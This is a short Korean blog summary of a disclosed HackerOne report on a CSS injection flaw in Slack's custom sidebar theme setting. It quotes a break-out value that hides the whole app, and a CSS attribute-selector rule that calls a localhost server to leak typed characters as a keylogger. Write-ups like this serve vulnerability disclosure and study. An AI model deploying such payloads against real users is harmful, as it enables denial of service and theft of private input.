Web Hacking/hackerone 바운티 분석
[slack] CSS Injection to disable app & potential message exfil
ICEB34R
2019. 11. 11. 15:52
- 대상 : Slack
- 취약점 : Improper Input Validation, css injection
- 위험도 : Medium (4.3)
- 바운티 : 500$
- 링크 : https://hackerone.com/reports/679969
Slack Mac OS v4.0.2에서 테스팅 하였습니다.
- 설정 -> 테마 -> 사이드 바
- 커스텀 테마 설정
- column BG 를
#FFFFFF;} html {display:none;}로 변경 - 앱이 터짐
input[type="text"][value$="a"] {
background-image: url("http://localhost:3000/a");
}커스텀 테마 형식으로 배포된다면 해당 코드가 삽입되어 키로거로 활용될 수 있음.